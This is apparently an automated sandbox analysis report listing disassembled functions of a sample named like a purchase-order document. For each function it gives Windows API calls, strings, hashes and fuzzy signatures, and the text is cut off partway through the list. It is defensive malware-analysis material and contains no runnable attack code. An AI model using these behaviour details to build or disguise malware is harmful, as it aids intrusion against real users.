Opcode ID: 00fc5db57fa7c214ee4fd5667caf830a807294ff9bae606d2a33032af49ff0e7
Instruction ID: 0be75612581abf159567d1f67f6ddcf56f2f15a2cc3c0d32f5593f7d56d7d80c
Opcode Fuzzy Hash: 00fc5db57fa7c214ee4fd5667caf830a807294ff9bae606d2a33032af49ff0e7
Instruction Fuzzy Hash: 8C914D75A08206DFCB18CF98C0D06A9B7F2FF68314F658169E945AB360E731ED91CB90

Function 001AC5D0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 191windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00147620: _wcslen.LIBCMT ref: 00147625

GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 001AC6EE
_wcslen.LIBCMT ref: 001AC735
SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 001AC79C
SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 001AC7CA

Strings

0, xrefs: 001AC6AF

Memory Dump Source

Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true

Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd

Similarity

API ID: ItemMenu$Info_wcslen$Default
String ID: 0
API String ID: 1227352736-4108050209
Opcode ID: 844cdf1c47965c8a8c1994cb719e3d800312fb7e0a258f0055395efe6fd3e76e
Instruction ID: 76e270ea9cfa44f7fa059bc12ae472da7ccec0b29de54ffff4100a72940873a1
Opcode Fuzzy Hash: 844cdf1c47965c8a8c1994cb719e3d800312fb7e0a258f0055395efe6fd3e76e
Instruction Fuzzy Hash: 895101796043019BD715DF68C885BAB77E8AF5A310F040A2DF9A5D32A0DB70D844CFD2

Function 001CAD64 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 176COMMON

Download Yara Rule

APIs

ShellExecuteExW.SHELL32(0000003C), ref: 001CAEA3

Part of subcall function 00147620: _wcslen.LIBCMT ref: 00147625

GetProcessId.KERNEL32(00000000), ref: 001CAF38
CloseHandle.KERNEL32(00000000), ref: 001CAF67

Strings

@, xrefs: 001CAE72
<, xrefs: 001CAE6B

Memory Dump Source

Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true

Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd

Similarity

API ID: CloseExecuteHandleProcessShell_wcslen
String ID: <$@
API String ID: 146682121-1426351568
Opcode ID: f58088cbe39652ac22e7b71cbdc69cf52ea00ba8ba430fe5cbef5605d2ba035e
Instruction ID: e315f40b1c2bf45d4567b83897d07657b9ee98fbbfb829b9705240656f771995
Opcode Fuzzy Hash: f58088cbe39652ac22e7b71cbdc69cf52ea00ba8ba430fe5cbef5605d2ba035e
Instruction Fuzzy Hash: 87714570A00619DFCB15DFA4D485A9EBBB0FF18318F44889DE816AB3A2C774ED45CB91

Function 001A719E Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 120comlibraryloaderCOMMON

Download Yara Rule

APIs

CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 001A7206
SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 001A723C
GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 001A724D
SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 001A72CF

Strings

DllGetClassObject, xrefs: 001A7242

Memory Dump Source

Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true

Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd

Similarity

API ID: ErrorMode$AddressCreateInstanceProc
String ID: DllGetClassObject
API String ID: 753597075-1075368562
Opcode ID: b2ea579c56065e2fde32426f4c42fcc7eb3a74434b02ab9b7f8caede35e8b531
Instruction ID: aa7e0097a290af099ba0943e1f4afdafb24857302925213d5e954f4b5481cd2a
Opcode Fuzzy Hash: b2ea579c56065e2fde32426f4c42fcc7eb3a74434b02ab9b7f8caede35e8b531
Instruction Fuzzy Hash: 85417F75605204EFDB15CF54CC84BAA7BA9EF46310F1580AEBD059F28AD7B0DA45CBA0

Function 001D3D7C Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 101windowCOMMON

Download Yara Rule

APIs

GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 001D3E35
IsMenu.USER32(?), ref: 001D3E4A
InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 001D3E92
DrawMenuBar.USER32 ref: 001D3EA5

Strings

0, xrefs: 001D3D89

Memory Dump Source

Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true

Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd

Similarity

API ID: Menu$Item$DrawInfoInsert
String ID: 0
API String ID: 3076010158-4108050209
Opcode ID: e59685dd375d17eae963757fec2835134e094001f074b10c5afb5fce42a48624
Instruction ID: 5ee3e772512eaa98aaaeba8477511f6f6594596bab68693579781c608be9f67f
Opcode Fuzzy Hash: e59685dd375d17eae963757fec2835134e094001f074b10c5afb5fce42a48624
Instruction Fuzzy Hash: AC414A75A01209AFDB10DF50E884AEABBB9FF49350F04412AE92597390D730AE55CF91

Function 001A1DE2 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 93windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00149CB3: _wcslen.LIBCMT ref: 00149CBD

Part of subcall function 001A3CA7: GetClassNameW.USER32(?,?,000000FF), ref: 001A3CCA

SendMessageW.USER32(?,00000188,00000000,00000000), ref: 001A1E66
SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 001A1E79
SendMessageW.USER32(?,00000189,?,00000000), ref: 001A1EA9

Part of subcall function 00146B57: _wcslen.LIBCMT ref: 00146B6A

Strings

ListBox, xrefs: 001A1E25
ComboBox, xrefs: 001A1DF0

Memory Dump Source

Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true

Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd

Similarity

API ID: MessageSend$_wcslen$ClassName
String ID: ComboBox$ListBox
API String ID: 2081771294-1403004172
Opcode ID: 4bca9b16b03ab3cb9d569b493871fbbc507828cf9f0ffbc7e794960a4e90d4a2
Instruction ID: d64ac6ce0536f9d7e957f82441ce7b1668f5916cd058e3d33909988d866c5148
Opcode Fuzzy Hash: 4bca9b16b03ab3cb9d569b493871fbbc507828cf9f0ffbc7e794960a4e90d4a2
Instruction Fuzzy Hash: CE216675A00104BEDB19ABA4DC46CFFB7B8EF53364F10451AF821A72E1DB344D0ADA60

Function 001D2F17 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 78windowlibraryCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000467,00000000,?), ref: 001D2F8D
LoadLibraryW.KERNEL32(?), ref: 001D2F94
SendMessageW.USER32(?,00000467,00000000,00000000), ref: 001D2FA9
DestroyWindow.USER32(?), ref: 001D2FB1

Strings

SysAnimate32, xrefs: 001D2F68

Memory Dump Source

Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true

Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd

Similarity

API ID: MessageSend$DestroyLibraryLoadWindow
String ID: SysAnimate32
API String ID: 3529120543-1011021900
Opcode ID: 5b5c83e184013b0539e013550e1770318140807c8ed67a2b0488001b79f29278
Instruction ID: f4a21e3fae250efe555454abfa372c7e4b1ef116dab39c9baa9334b414df2060
Opcode Fuzzy Hash: 5b5c83e184013b0539e013550e1770318140807c8ed67a2b0488001b79f29278
Instruction Fuzzy Hash: 4B219D71204205AFEB104F64DC84EBB77BDEF69368F104A1AFA64D72A0D771DC91A760

Function 00164D6D Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00164D1E,001728E9,?,00164CBE,001728E9,002088B8,0000000C,00164E15,001728E9,00000002), ref: 00164D8D
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00164DA0
FreeLibrary.KERNEL32(00000000,?,?,?,00164D1E,001728E9,?,00164CBE,001728E9,002088B8,0000000C,00164E15,001728E9,00000002,00000000), ref: 00164DC3

Strings

mscoree.dll, xrefs: 00164D86
CorExitProcess, xrefs: 00164D98

Memory Dump Source

Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true

Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: e637611abeb4145332be7343c73b41216a98dd9a7a7beafe9327de555506aa3b
Instruction ID: 86544713685fa0ff5a29202d56e132bbbd5f18b6d60a5fb7b2e94b324188014b
Opcode Fuzzy Hash: e637611abeb4145332be7343c73b41216a98dd9a7a7beafe9327de555506aa3b
Instruction Fuzzy Hash: 89F0AF30A02219FBDB119F90DC09BEEBBB9EF58751F0001A9F805A2660CF705A90CAD0

Function 00144E90 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 24libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,?,00144EDD,?,00211418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00144E9C
GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00144EAE
FreeLibrary.KERNEL32(00000000,?,?,00144EDD,?,00211418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00144EC0

Strings

kernel32.dll, xrefs: 00144E94
Wow64DisableWow64FsRedirection, xrefs: 00144EA8

Memory Dump Source

Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true

Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd

Similarity

API ID: Library$AddressFreeLoadProc
String ID: Wow64DisableWow64FsRedirection$kernel32.dll
API String ID: 145871493-3689287502
Opcode ID: f445f8c4b39db2a83dc8b67c142f883d2a9b35872534c83c37c34ee1e40313ec
Instruction ID: e4603957b4ea70a44fbef1215d1484e31a3027cd14164c4b9b5fd79182ab8d70
Opcode Fuzzy Hash: f445f8c4b39db2a83dc8b67c142f883d2a9b35872534c83c37c34ee1e40313ec
Instruction Fuzzy Hash: CDE08635A03633DBD22117256C1CB9B6658AF81B627050516FC00E2261DF64CD41C4E4

Function 00144E59 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 22libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,?,00183CDE,?,00211418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00144E62
GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00144E74
FreeLibrary.KERNEL32(00000000,?,?,00183CDE,?,00211418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00144E87

Strings

Wow64RevertWow64FsRedirection, xrefs: 00144E6E
kernel32.dll, xrefs: 00144E5B

Memory Dump Source

Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true

Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd

Similarity

API ID: Library$AddressFreeLoadProc
String ID: Wow64RevertWow64FsRedirection$kernel32.dll
API String ID: 145871493-1355242751
Opcode ID: b3db7d5537931450275d3128aa5a242d7ee3cb2ae430db0c5980829f91da0558
Instruction ID: 416c1ee14c3a97bcd3e34482b7aa9318eb2d1228ee8edb31ab6c44eb28be443c
Opcode Fuzzy Hash: b3db7d5537931450275d3128aa5a242d7ee3cb2ae430db0c5980829f91da0558
Instruction Fuzzy Hash: 08D0123550363397AA221B256C18ECB6B1CAF85B513050A17B905F3165CF64CD41C5D0

Function 001B2947 Relevance: 7.8, APIs: 5, Instructions: 313fileCOMMON

Download Yara Rule

APIs

DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 001B2C05
DeleteFileW.KERNEL32(?), ref: 001B2C87
CopyFileW.KERNEL32(?,?,00000000,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 001B2C9D
DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 001B2CAE
DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 001B2CC0

Memory Dump Source

Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true

Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd

Similarity

API ID: File$Delete$Copy
String ID:
API String ID: 3226157194-0
Opcode ID: 580c257ab64aaa75c8b036429fcf3c403f9b733bfbbfe722d366efdcc67aa060
Instruction ID: 916c5975aa783047aba904ff3f1ee10ae325f57b6b9c7ea7b80a36d4d4c7640b
Opcode Fuzzy Hash: 580c257ab64aaa75c8b036429fcf3c403f9b733bfbbfe722d366efdcc67aa060
Instruction Fuzzy Hash: 72B16E72D00119ABDF25DBA4CC85EDEBBBDEF59340F1040A6F509E7151EB309A488FA1

Function 001CA387 Relevance: 7.8, APIs: 5, Instructions: 256COMMON

Download Yara Rule

APIs

GetCurrentProcessId.KERNEL32 ref: 001CA427
OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 001CA435
GetProcessIoCounters.KERNEL32(00000000,?), ref: 001CA468
CloseHandle.KERNEL32(?), ref: 001CA63D

Memory Dump Source

Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true

Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd

Similarity

API ID: Process$CloseCountersCurrentHandleOpen
String ID:
API String ID: 3488606520-0
Opcode ID: cfa8482ddde0989381df944357ff9ce45107206ffa0e3b78ad22f3ce0a9c5b06
Instruction ID: 459b8f0e9ba944c1eed03ae40668bf748c302d47a2b2335143f54de1c30e3a31
Opcode Fuzzy Hash: cfa8482ddde0989381df944357ff9ce45107206ffa0e3b78ad22f3ce0a9c5b06
Instruction Fuzzy Hash: 2FA1B1716043019FD721DF28C886F2AB7E1AF98718F54881DF96A9B392D771EC45CB82

Function 0017BB27 Relevance: 7.7, APIs: 5, Instructions: 171timeCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,001E3700), ref: 0017BB91
WideCharToMultiByte.KERNEL32(00000000,00000000,0021121C,000000FF,00000000,0000003F,00000000,?,?), ref: 0017BC09
WideCharToMultiByte.KERNEL32(00000000,00000000,00211270,000000FF,?,0000003F,00000000,?), ref: 0017BC36
_free.LIBCMT ref: 0017BB7F

Part of subcall function 001729C8: RtlFreeHeap.NTDLL(00000000,00000000,?,0017D7D1,00000000,00000000,00000000,00000000,?,0017D7F8,00000000,00000007,00000000,?,0017DBF5,00000000), ref: 001729DE
Part of subcall function 001729C8: GetLastError.KERNEL32(00000000,?,0017D7D1,00000000,00000000,00000000,00000000,?,0017D7F8,00000000,00000007,00000000,?,0017DBF5,00000000,00000000), ref: 001729F0

_free.LIBCMT ref: 0017BD4B

Memory Dump Source

Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true

Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd

Similarity

API ID: ByteCharMultiWide_free$ErrorFreeHeapInformationLastTimeZone
String ID:
API String ID: 1286116820-0
Opcode ID: c98f79dc140429f3cfc5f78b6f84dc84c0220dc631eabd81b90122caea9db230
Instruction ID: 848cd77af235fae4ef79780425fedc6c0f43b3940f3ddfcb327472920e0b4d28
Opcode Fuzzy Hash: c98f79dc140429f3cfc5f78b6f84dc84c0220dc631eabd81b90122caea9db230
Instruction Fuzzy Hash: 53510971908219AFCB10EF65DCC5AAEB7BCEF54310F10C26AE918D7191EB305E81CB50

Function 001AE3FB Relevance: 7.7, APIs: 5, Instructions: 167filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 001ADDE0: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,001ACF22,?), ref: 001ADDFD

Part of subcall function 001ADDE0: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,001ACF22,?), ref: 001ADE16

Part of subcall function 001AE199: GetFileAttributesW.KERNEL32(?,001ACF95), ref: 001AE19A

lstrcmpiW.KERNEL32(?,?), ref: 001AE473
MoveFileW.KERNEL32(?,?), ref: 001AE4AC
_wcslen.LIBCMT ref: 001AE5EB
_wcslen.LIBCMT ref: 001AE603
SHFileOperationW.SHELL32(?,?,?,?,?,?), ref: 001AE650

Memory Dump Source

Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true

Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd

Similarity

API ID: File$FullNamePath_wcslen$AttributesMoveOperationlstrcmpi
String ID:
API String ID: 3183298772-0
Opcode ID: e960fd1fcd078c6baa5dad3b1a3e5527ea25e4d656829d3738d9e42f7b3cb8b6
Instruction ID: c46419c78065040ceb723dfcee605ee0fc51b6527289aa40f54b454da4aef3f2
Opcode Fuzzy Hash: e960fd1fcd078c6baa5dad3b1a3e5527ea25e4d656829d3738d9e42f7b3cb8b6
Instruction Fuzzy Hash: 1A5177B64083459BC724EBA4DC819DFB3ECAF95340F00491EF589D3191EF74A688C766

Function 001CB9C9 Relevance: 7.7, APIs: 5, Instructions: 167registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00149CB3: _wcslen.LIBCMT ref: 00149CBD

Part of subcall function 001CC998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,001CB6AE,?,?), ref: 001CC9B5
Part of subcall function 001CC998: _wcslen.LIBCMT ref: 001CC9F1
Part of subcall function 001CC998: _wcslen.LIBCMT ref: 001CCA68
Part of subcall function 001CC998: _wcslen.LIBCMT ref: 001CCA9E

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 001CBAA5
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 001CBB00
RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 001CBB63
RegCloseKey.ADVAPI32(?,?), ref: 001CBBA6
RegCloseKey.ADVAPI32(00000000), ref: 001CBBB3

Memory Dump Source

Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true

Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd

Similarity

API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpper
String ID:
API String ID: 826366716-0
Opcode ID: 5cf78c4db6adb106b16748efb7bd2f05f2e1d73c1beb5bc95713fc36d4d53442
Instruction ID: 72d95ab3595897a5baead23a26cd3705e1a86980a4293510d4bbc0da26168f13
Opcode Fuzzy Hash: 5cf78c4db6adb106b16748efb7bd2f05f2e1d73c1beb5bc95713fc36d4d53442
Instruction Fuzzy Hash: 85614831209241AFD714DF24C4D1F2ABBE5BF94308F54895DF49A8B2A2DB31ED45CB92

Function 001A8BB0 Relevance: 7.7, APIs: 5, Instructions: 159COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 001A8BCD
VariantClear.OLEAUT32 ref: 001A8C3E
VariantClear.OLEAUT32 ref: 001A8C9D
VariantClear.OLEAUT32(?), ref: 001A8D10
VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 001A8D3B

Memory Dump Source

Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true

Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd

Similarity

API ID: Variant$Clear$ChangeInitType
String ID:
API String ID: 4136290138-0
Opcode ID: 7ebed7fc21fc50eb0b2cc193355692db47bd7876b280dbb972aa460ee9b4a7df
Instruction ID: 048c8e28eb2deb29c1415dd87a6122ce19330172609013ebe90f6b3d131b5f67
Opcode Fuzzy Hash: 7ebed7fc21fc50eb0b2cc193355692db47bd7876b280dbb972aa460ee9b4a7df
Instruction Fuzzy Hash: EE516AB5A0121AEFCB14CF68C894AAAB7F8FF89310B158559F905DB354E730E911CF90

Function 001B8AFB Relevance: 7.6, APIs: 5, Instructions: 143COMMON

Download Yara Rule

APIs

GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 001B8BAE
GetPrivateProfileSectionW.KERNEL32(?,00000003,00000003,?), ref: 001B8BDA
WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 001B8C32
WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 001B8C57
WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 001B8C5F

Memory Dump Source

Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true

Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
